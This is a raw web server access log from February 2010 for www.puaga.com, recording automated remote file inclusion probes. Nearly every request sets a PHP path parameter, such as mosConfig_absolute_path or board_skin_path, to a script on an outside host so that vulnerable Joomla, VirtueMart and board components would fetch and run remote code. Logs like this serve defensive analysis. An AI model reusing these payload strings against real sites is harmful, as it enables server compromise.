75.125.186.154 - - [19/Feb/2010:07:08:46 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:07:08:46 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:07:09:13 -0800] "GET /logs/access_100111.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [19/Feb/2010:07:09:21 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [19/Feb/2010:07:09:21 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [19/Feb/2010:07:09:21 -0800] "GET /logs/access_100118.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:09:37 -0800] "GET /logs///ktmlstandard/includes/ktedit/toolbar.php?dirDepth=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:09:37 -0800] "GET //ktmlstandard/includes/ktedit/toolbar.php?dirDepth=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:09:37 -0800] "GET /logs/access_100129.log///ktmlstandard/includes/ktedit/toolbar.php?dirDepth=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:09:51 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:09:51 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:09:51 -0800] "GET /logs/access_100123.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:09:52 -0800] "GET /logs/access_100127.log///ktmlstandard/includes/ktedit/toolbar.php?dirDepth=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [19/Feb/2010:07:10:24 -0800] "GET /bbs///////delete_all.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [19/Feb/2010:07:10:24 -0800] "GET /logs//bbs///////delete_all.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.54.22.2 - - [19/Feb/2010:07:10:28 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://shop.esmok.ch//images/stories/fruit/idi.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
74.54.22.2 - - [19/Feb/2010:07:10:28 -0800] "GET /logs/access_100201.log/components/com_forum/download.php?phpbb_root_path=http://shop.esmok.ch//images/stories/fruit/idi.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
74.54.22.2 - - [19/Feb/2010:07:10:29 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://shop.esmok.ch//images/stories/fruit/idi.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
123.143.29.250 - - [19/Feb/2010:07:10:30 -0800] "GET /logs/access_100205.log//bbs///////delete_all.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.54.22.2 - - [19/Feb/2010:07:10:38 -0800] "GET /logs/access_100201.log/components/com_forum/download.php?phpbb_root_path=http://shop.esmok.ch//images/stories/fruit/idi.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
74.54.22.2 - - [19/Feb/2010:07:10:38 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://shop.esmok.ch//images/stories/fruit/idi.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
74.54.22.2 - - [19/Feb/2010:07:10:38 -0800] "GET /logs/access.log/components/com_forum/download.php?phpbb_root_path=http://shop.esmok.ch//images/stories/fruit/idi.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
74.54.22.2 - - [19/Feb/2010:07:10:38 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://shop.esmok.ch//images/stories/fruit/idi.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
200.150.6.42 - - [19/Feb/2010:07:10:47 -0800] "GET /logs/access_100120.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [19/Feb/2010:07:10:53 -0800] "GET /logs/access_100120.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [19/Feb/2010:07:11:01 -0800] "GET /logs/access.log//bbs///////delete_all.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.73.168.38 - - [19/Feb/2010:07:14:22 -0800] "GET /logs/access_100203.log//bbs/write_update.php?board_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:14:35 -0800] "GET /logs/access.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.73.168.38 - - [19/Feb/2010:07:14:50 -0800] "GET /logs/access_100206.log//bbs/write_update.php?board_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.59.71.104 - - [19/Feb/2010:07:15:30 -0800] "GET /index.php?pilih=news&%20mod=yes&aksi=recommend&id=http://www.ikyoku.co.kr//cgi/inquiry/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
64.59.71.104 - - [19/Feb/2010:07:15:30 -0800] "GET /logs/access_100121.log/index.php?pilih=news&%20mod=yes&aksi=recommend&id=http://www.ikyoku.co.kr//cgi/inquiry/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.59.71.104 - - [19/Feb/2010:07:15:30 -0800] "GET /logs/index.php?pilih=news&%20mod=yes&aksi=recommend&id=http://www.ikyoku.co.kr//cgi/inquiry/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.59.71.104 - - [19/Feb/2010:07:15:34 -0800] "GET /logs/access_100204.log/index.php?pilih=news&%20mod=yes&aksi=recommend&id=http://www.ikyoku.co.kr//cgi/inquiry/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [19/Feb/2010:07:15:39 -0800] "GET /logs/access_100126.log%20%20//ashnews.php?pathtoashnews=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [19/Feb/2010:07:15:39 -0800] "GET /ashnews.php?pathtoashnews=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [19/Feb/2010:07:15:39 -0800] "GET /logs//ashnews.php?pathtoashnews=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [19/Feb/2010:07:15:42 -0800] "GET /logs/access_100114.log%20%20//ashnews.php?pathtoashnews=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:07:15:42 -0800] "GET /logs/access_100121.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [19/Feb/2010:07:15:51 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://chloethecat.com//guestbook/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [19/Feb/2010:07:15:51 -0800] "GET /logs/access_100127.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://chloethecat.com//guestbook/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [19/Feb/2010:07:15:51 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://chloethecat.com//guestbook/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:07:15:52 -0800] "GET /logs/access_100122.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [19/Feb/2010:07:15:53 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://chloethecat.com//guestbook/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [19/Feb/2010:07:15:53 -0800] "GET /logs/access_100127.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://chloethecat.com//guestbook/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [19/Feb/2010:07:15:53 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://chloethecat.com//guestbook/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [19/Feb/2010:07:15:59 -0800] "GET /logs/access_100124.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://chloethecat.com//guestbook/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [19/Feb/2010:07:16:00 -0800] "GET /logs/access_100124.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://chloethecat.com//guestbook/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [19/Feb/2010:07:16:13 -0800] "GET /logs/access_100204.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://chloethecat.com//guestbook/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [19/Feb/2010:07:16:13 -0800] "GET /logs/access_100204.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://chloethecat.com//guestbook/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [19/Feb/2010:07:16:30 -0800] "GET /logs/access_100203.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://chloethecat.com//guestbook/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [19/Feb/2010:07:16:32 -0800] "GET /logs/access_100203.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://chloethecat.com//guestbook/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.73.168.38 - - [19/Feb/2010:07:16:35 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.73.168.38 - - [19/Feb/2010:07:16:35 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.73.168.38 - - [19/Feb/2010:07:16:35 -0800] "GET /logs/access_100125.log%20%20//bbs/write_update.php?board_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.73.168.38 - - [19/Feb/2010:07:16:35 -0800] "GET /logs/access.log%20%20//bbs/write_update.php?board_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.57.79.113 - - [19/Feb/2010:07:16:53 -0800] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://giveu.asadal.com/index/smarty/fx29id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.57.79.113 - - [19/Feb/2010:07:16:53 -0800] "GET /logs/access_100121.log///components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://giveu.asadal.com/index/smarty/fx29id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.57.79.113 - - [19/Feb/2010:07:16:53 -0800] "GET /logs///components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://giveu.asadal.com/index/smarty/fx29id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.57.79.113 - - [19/Feb/2010:07:17:08 -0800] "GET /logs/access.log///components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://giveu.asadal.com/index/smarty/fx29id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:07:17:14 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:07:17:14 -0800] "GET /logs/access_100201.log//skin/zero_vote/ask_password.php?dir=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:07:17:14 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [19/Feb/2010:07:17:59 -0800] "GET /logs/access_100111.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://chloethecat.com//guestbook/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [19/Feb/2010:07:18:00 -0800] "GET /logs/access_100111.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://chloethecat.com//guestbook/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [19/Feb/2010:07:18:11 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:18:18 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:18:18 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:18:18 -0800] "GET /logs/access_100205.log%20%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [19/Feb/2010:07:18:21 -0800] "GET /logs/access_100114.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://chloethecat.com//guestbook/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [19/Feb/2010:07:18:22 -0800] "GET /logs/access_100114.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://chloethecat.com//guestbook/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [19/Feb/2010:07:18:39 -0800] "GET /logs/access_100124.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
210.127.209.105 - - [19/Feb/2010:07:18:39 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:18:47 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:18:47 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:18:47 -0800] "GET /logs/access_100205.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:20:04 -0800] "GET /logs/access_100123.log%20%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [19/Feb/2010:07:20:18 -0800] "GET /logs/access_100127.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:20:25 -0800] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:20:25 -0800] "GET /logs/access_100123.log%20%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [19/Feb/2010:07:21:09 -0800] "GET /logs/access_100124.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
210.127.209.105 - - [19/Feb/2010:07:21:11 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
210.127.209.105 - - [19/Feb/2010:07:21:12 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:21:34 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:21:34 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:21:34 -0800] "GET /logs/access_100205.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [19/Feb/2010:07:21:48 -0800] "GET /logs/access_100124.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://chloethecat.com//guestbook/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [19/Feb/2010:07:21:48 -0800] "GET /logs/access_100127.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://chloethecat.com//guestbook/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [19/Feb/2010:07:21:52 -0800] "GET /logs/access_100124.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://chloethecat.com//guestbook/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [19/Feb/2010:07:21:52 -0800] "GET /logs/access_100127.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://chloethecat.com//guestbook/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:07:22:06 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:07:22:09 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:07:22:12 -0800] "GET /logs/access_100201.log//skin/zero_vote/ask_password.php?dir=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.59.71.104 - - [19/Feb/2010:07:22:17 -0800] "GET /logs/index.php?pilih=news&%20mod=yes&aksi=recommend&id=http://www.ikyoku.co.kr//cgi/inquiry/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.59.71.104 - - [19/Feb/2010:07:22:18 -0800] "GET /index.php?pilih=news&%20mod=yes&aksi=recommend&id=http://www.ikyoku.co.kr//cgi/inquiry/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
64.59.71.104 - - [19/Feb/2010:07:22:19 -0800] "GET /logs/access_100121.log%20%20/index.php?pilih=news&%20mod=yes&aksi=recommend&id=http://www.ikyoku.co.kr//cgi/inquiry/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:22:23 -0800] "GET /administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:22:23 -0800] "GET /logs//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:22:23 -0800] "GET /logs/access_100122.log//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:22:23 -0800] "GET /logs//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:22:23 -0800] "GET /logs/access_100107.log//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
